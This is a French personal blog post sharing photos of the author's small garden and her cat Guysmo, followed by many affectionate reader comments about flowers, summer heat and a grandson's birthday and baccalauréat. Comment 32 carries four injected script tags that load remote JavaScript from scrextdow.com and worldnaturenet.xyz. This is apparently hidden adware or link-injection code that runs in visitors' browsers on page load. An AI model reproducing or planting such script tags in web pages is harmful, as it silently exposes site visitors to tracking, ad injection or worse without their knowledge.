• Dans mon jardinet ...

     

    Je ne suis ni peintre, ni artiste, ni photographe, ni poète

    mais je me fais plaisir

    dans mon jardinet quand sont là les beaux jours,

    je clique sans modération  !!!

    xx

     

     

     Dans mon jardinet ...

     

    Une fin de vie  "modeste" . 

     

     Dans mon jardinet ...

     

     Dans mon jardinet ...

     

    merci de vos visites !

     

    Absente ce WE !!

    nous fêtons à la campagne l'anniversaire  d'Emile 18a

    et ...

     Dans mon jardinet ...

     

    « Encore pour quelques temps ...Fête familiale en ce jour de juillet ... »
    Partager via Gmail

  • Commentaires

    52
    Mardi 4 Septembre 2018 à 11:50

    Bonjour Nicole, tu en as un bien joli jardin ; merci pour ce partage. Le commentaire dont je t'a parlé il y a 2 jours c'était sur un anniversaire en juillet bisous et bonne journée

    51
    Mercredi 29 Août 2018 à 21:25

    coucou juju je passe ce soir te souhaiter une bonne soirer

    pluie cher nouset fraie

    50
    Mercredi 29 Août 2018 à 19:49

    Bonsoir ma chère  Juju

    Merci pour ces belles photos de belles fleurs mais ce que je préfère c'est ton chat, il ressemble à la mienne Ils auraient fait un beau couple lol

    Bonne journée  pour l'anniversaire de ton petit-fils et bravo pour son bac mes meilleurs voeux pour lui

    Bonne et douce soirée et gros bisous d'amitié

    ton amie Janine

    49
    Mercredi 29 Août 2018 à 17:46

    bonjour Nicole , ah oui l'important est le partage entre nous !  pas de compétition !!!

    merci pour tes photos et tu as de belles fleurs et caresses au minou 

    gros bisous belle fin de journée  a+

    ah 18 ans ça se fête +++  hi hi hi

    48
    Mercredi 29 Août 2018 à 15:53

    Oh que de jolies photos chère Nicole,

    y compris le basilic (j'ai mis du mien ce midi sur ma tomate)!

    Tu as abusé de tes photos après tu ne sauras plus nous en mettre. Mais elles sont si belles.

    Merci beaucoup d'avoir mis mon blog en couleurs d'automne, oui ça me plait bien et pas besoin de changer de couleur d'écriture.

    Félicitations à Emile (comme mon Papa) pour son bac et ses 18ans. Il a fait comme ma grande petite fille Léa qui a eu son bac et ses 18 ans fêtés avec nous et avec ses copines et sa plus haute cousine (mais 16 ans seulement en 11/18)

    Bonne journée ensoleillée, nous un orage de tonnerre de Brest cette nuit et pluie plus calme ce matin et le vent s'est calmé, après avoir fichu presque toutes les pêches par terre. Mais je ne sais plus où mettre mes compotes le congélateur est plein!!

    Je t'embrasse.

    Merci aussi pour la musique, je voulais déjà te le dire avant.

    47
    Lundi 27 Août 2018 à 18:21

    Bonjour Juju

    Très belles tes photos , je vois que tu aimes les fleurs et ton chat se prélasse la vie est belle pour lui!

    Merci pour tes visites . Quant à moi je reprendrais à la rentrée doucement car manque de courage et d'inspiration. je te fais des bisous. Chrys.

    46
    Dimanche 26 Août 2018 à 15:07

    un petit coucou Nicole, il fait un soleil magnifique chez nous et même mais le soir ont sent l'automne,je te souhaite un très bon dimanche,bises

    45
    Dimanche 26 Août 2018 à 11:56

    Et on a déjà passé la moitié du mois de Juin les journées s'envolent

    Bonjour belle journée
    Regarde autour de toi
    Elle est arrivée
    La voilà la colombe
    Qui apporte une lettre de moi
    Pour te dire bon dimanche 
    Et te faire des gros bisous de kikinette

    Et on a déjà passé la moitié du mois de Juin les journées s'envolent

    44
    Mercredi 22 Août 2018 à 14:18

    un petit coucou Nicole,,il fait chaud aujourd'hui chez nous ,je te souhaite un très bon Mercredi,bises

    43
    Mardi 21 Août 2018 à 13:00

    J'espère qu'avec les chaleurs toutes tes fleurs n'ont pas trop souffert, ça occupe bien et c'est toujours plaisant .

    Bisous et bonne pause 

    Lucia

    42
    Mardi 21 Août 2018 à 10:31

    bonjour ma Juju tu vas bien je n'ai pas peut aller sur ton autre blog

    j'aime ton montage de ton jardin c'est beau

    et ton chat c'est bien 

    belle journée ma douce

    gros bisous Elyci

    41
    Lundi 20 Août 2018 à 07:26

    Bonjour Juju ,ce méli mélo de fleurs dans ton jardinet est super bien présenté !Encore beaucoup de chaleur en cette fin d’août !AMITIES

    40
    Lundi 20 Août 2018 à 07:24

    Les bons souhaitsbisous bisous merci pour ta visite j ai apprécié amitiés super ici 

    39
    Jeudi 9 Août 2018 à 10:31

    Coucou!

    J'espère que tu vas bien et que tu passes un bel été sans avoir trop chaud.

    Ici,ça s'est rafraichit aujourd'hui,ça fait du bien.

    Quand on est parti en balade ces derniers temps,il faisait une chaleur pas possible!

    Bises et à bientôt!

    38
    Mardi 7 Août 2018 à 11:14

    coucou juju  bon mardi derniere journée de chaleur de prevu....ont verra bien....bonne journée

    37
    Lundi 6 Août 2018 à 10:42

    Bonjour ma petite Juju,

    Cela fait un moment que je ne suis pas venue sur ce blog-là.

    Superbes toutes tes photos, j'adore !

    Bonne journée mon amie adorée.

    Gros bisous

    Florence

    36
    Lundi 6 Août 2018 à 05:55

    petit coucou pour te souhaiter une belle journée, bisous

    35
    Mercredi 1er Août 2018 à 16:12

    kikou Manou, 

    moi aussi en semi pause par cette chaleur ! 

    Nous voulions un été, nous l'avons , j'aime bien mais avec 3-4° en moins ça serait mieux. 

    Tu vas bien? ici pleine récolte de tomates, je vais certainement faire du coulis, j'en ai donné 2kg à Jess , on coupe tous les jours. 

    Passe une bonne fin de semaine et prends soin de toi, gros bisous, 

    Nadine

    34
    Samedi 21 Juillet 2018 à 18:24

    Bonjour Nicole 

    clique  !  clique  !! sans modération 

    Merci de nous faire partager ton jardinet , je le trouve joliment fleutri ..

    je fais un p'tit coucou , avant mon départ à Toulouse comme tous les ans en Août , même si mon ordi m'accompagne , les problèmes  avec mes yeux augmentent eux ..grrrrrrrrr

    il faut aller à son rythme 

    à bientôt gros bisous  

    33
    Jeudi 19 Juillet 2018 à 19:58

    Bonsoir Nicole

    Un jardinet c'est mieux que rien et quand on a grand ça demande beaucoup d'entretien . Avec retard un bon anniversaire à ton petit fils . Bonne soirée  bises 

    32
    Mercredi 18 Juillet 2018 à 18:12

    coucou juju je passe vite fait te faire un petit bonjour pas trop presente jai mes petite fille en vacances alors a bientot tous

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52293x7264x&r=31" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2&blocks[]=02aed" type="text/javascript"></script>
    31
    Lundi 16 Juillet 2018 à 14:02

    Guysmo est très heureux Nicole,

    et ton jardinet un vrai bonheur ....

    Profites en bien surtout, moi je vis  maintenant en

    appartement et plus le bonheur de "jardiner"

    vraiment ......

    Bravo à ton petit-fils Emile chère amie pour son bac,

    et futur "bon anniversaire" à lui ...

    Belle journée et bises de Christiane

     

    30
    Lundi 16 Juillet 2018 à 09:14

    bonjour Juju tu vas bien

    il est beau ton coin de jardin ,j'aime tes photos c'est sympa comme tout

    et le minet est beau aussi

    il a fait de l'orage cette nuit

    et ce matin fraicheur et grisaille

    belle journée gros bisous

    Elyci

    29
    Lundi 16 Juillet 2018 à 08:57

    Bonjour ma petite Juju,

    Il est beau ton jardinet, j'adore tes photos ! Trop mimi le minet !

    Bonne journée mon amie adorée, gros bisous.

    Florence 

     

    28
    Mardi 10 Juillet 2018 à 13:16

    bonjour Nicole très beau ton jardinet que je découvre et tes photos sont très belles merci pour le beau partage de ton univers  j'espère que tu va bien ? je te souhaite une bonne après midi prend soin de toi ma douce

    gros bisous de ton amie

    Béa

    27
    Mardi 10 Juillet 2018 à 11:50

    Une belle journée à toi ma chérie !!! Merci pour ta superbe création " L'arbre aux fruits d'Or"!

     Mon dieu !!!! cette chanson, cette musique me remue les trippes...Ma maman disparue en 2016 et mon beau père son mari cette année.. Corse!!!!!

    C'est un peu le même style de chants que ceux de mon île de beauté !!! L'impression même que c'est du corse!!!

    J'arrête suis en larmes.. Merci bcp pour ce superbe morceau ma chérie!!!!!!Amitiés!!Chris/Beauty**

    26
    Lundi 9 Juillet 2018 à 17:09

    Bonjour Nicole,

    Il est beau ton petit jardinet, C'est agréable pour toi ce petit coin bien fleuri où se prélasse ton chat.

    Bisous. Mamyariane15

    25
    Lundi 9 Juillet 2018 à 12:56

    coucou nicole je passe dans ton beau jardin te souhaiter une bonne semaine bisous

    24
    Lundi 9 Juillet 2018 à 12:13

    Coucou Nicole très jolies photos

     bisous bonne semaine

    23
    Lundi 9 Juillet 2018 à 11:42

    Bonjour ma Juju...Magnifiques toute ces plantes diverses et variées!! Je vois également un gros matou vivant tranquillement au milieu de tout çà ! Encore un malheureux! lol…

     De nouveau la canicule toute cette semaine.. Alors à l'ombre beaucoup d'eau afin se désaltérer et ne pas se dessécher au risque de  ressembler à une veille pomme fripée****Pliééeee

     Belle journée et bon début de semaine ma minette**

    Ton amie: Chris/Beauty*

    22
    Soso
    Lundi 9 Juillet 2018 à 00:46
    Je n’avais pas vu cet article et je suis contente de le découvrir !
    Bisou dans ma nuit trop chaude pour dormir
    21
    Dimanche 8 Juillet 2018 à 19:53
    Septsup

    un petit coucou par ici… il est trop sympa ton "jardinet"... j espères que tu profites bien gros bisous

    20
    Dimanche 8 Juillet 2018 à 11:29

    Félicitation pour ton petit fils

    bisou ,

     

     

     

    19
    Samedi 7 Juillet 2018 à 23:31

    Bonsoir Nicole

    Félicitations à Emile pour son bac !

    Très joli ton jardinet bien surveiller par ton mignon 4 pattes

    Bon dimanche , gros bisous

    Coco

    18
    Samedi 7 Juillet 2018 à 21:15

    De belles choses dans ton jardinet Manou, mais le plus beau c'est ton Guyzmo

    Passe un agréable dimanche

    Bisous

    17
    Samedi 7 Juillet 2018 à 19:22
    bonsoir ton chat est le maitre du jardinet qui est bien fleuri et très agréable passe un très bon week end avec tes enfants bises MANOU
    16
    Samedi 7 Juillet 2018 à 18:30

    Il y a de belles choses dans ton jardinet ! 

    Bon week-end et félicitations pour le bac ...

    Bisous.

    Jo.

    15
    Samedi 7 Juillet 2018 à 12:46

    très jolie Nicole ces petites photos avec des fleurs j'aime bien,,la chaleur revient chez nous j'espère qu'il n'aura pas d'orage ,je te souhaite un très bon Samedi,bises

    14
    Samedi 7 Juillet 2018 à 11:37
    L'important est de se faire plaisir. Bisous
    13
    Samedi 7 Juillet 2018 à 10:14
    que de belles fleurs, ça me fait rêver, j'ai pas assez de place sur ma fenêtre. gros bisous ma Nicole. cathy
    12
    Samedi 7 Juillet 2018 à 10:03
    Quand l'envie de se faire plaisir est bien présente
    Tout va
    C'est agréable ce moment passé sur ton billet si bien organisé
    Bises
    Bonne journée
    11
    Samedi 7 Juillet 2018 à 09:53

    coucou nicole avec un beau soleil du matin je passe te souhaiter un bon week-end et félicitation pour le bac d émile

    10
    Samedi 7 Juillet 2018 à 09:01

    Un jardinet c'est mieux que rien ! C'est pareil pour nous, sûr que ça nous change de notre maison du Maroc, mais on peut être dehors quand on a envie et c'est toujours ça !

    Bisous et bonne journée

    9
    Samedi 7 Juillet 2018 à 07:33

    Bonjour Manou

    Il est très agréable ton jardinet, tu as de jolies fleurs et Guysmo apprécie l'endroit !

    Bon Anniversaire à Emile et Félicitations pour son Bac !!!

    Passe un très beau week-end avec les tiens

    Gros bisous

    8
    Samedi 7 Juillet 2018 à 07:25

    Et comme tu as raison Nicole, il est mimi ton jardinet et il faut en profiter.
    Bises et bon weekend

    7
    Samedi 7 Juillet 2018 à 07:05
    Profites ma douce un Regal pour les yeux tes clichés et ton Guysmo est superbe
    Bon samedi douceur et Joyeux anniversaire à ton petit fils félicitations pour son bac également c'est la vie qui commence réellement 18 ans l'âge de toutes les audaces et aussi de toutes les bonnes illusions
    Gros bisous prends soin de toi amitié Mado
    6
    Samedi 7 Juillet 2018 à 07:03

    Coucou ma douce Nicole,tes photos font rêver,magnifiques fleurs et ton petit compagnon a l'air d'apprécier ce belle univers.Merci pour ce beau partage.Bon samedi.Gros bisous.Le soleil est de retour.

    Jordana

    5
    Samedi 7 Juillet 2018 à 06:52

    profitons du moment présent !!

    merci pour tes photos cela me fait énormément plaisir 

    4
    Samedi 7 Juillet 2018 à 06:05

    C'est Guysmo le plus beau !!!happy

    Bon WE

    3
    Samedi 7 Juillet 2018 à 05:59

    Coucou Nicole , oui j'aime ton Guysmo qui me parait très heureux ! . Bravo à ton petit fils et le nôtre l'a aussi eu , chic ! . Bon week end dans ton agréable petit jardin , bisous , escapade , 

    2
    Samedi 7 Juillet 2018 à 04:10
    Floralie
    Bonjour ma chère Nicole,
    Tes photos sont superbes, moi aussi je rêve d'avoir un petit jardin mais j'ai pas c'est la vie ! Toutes tes photos sont chaleureuses et Guysmo est tout beau :)
    Bon samedi, gros bisous & à bientôt !
    1
    Samedi 7 Juillet 2018 à 00:36
    Bonjour Nicole,
    Mon rêve de posséder un jardin, même tout petit. Tu vois tu as bien de la chance.
    Passe une bonne journée, grosses bises Véronique


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :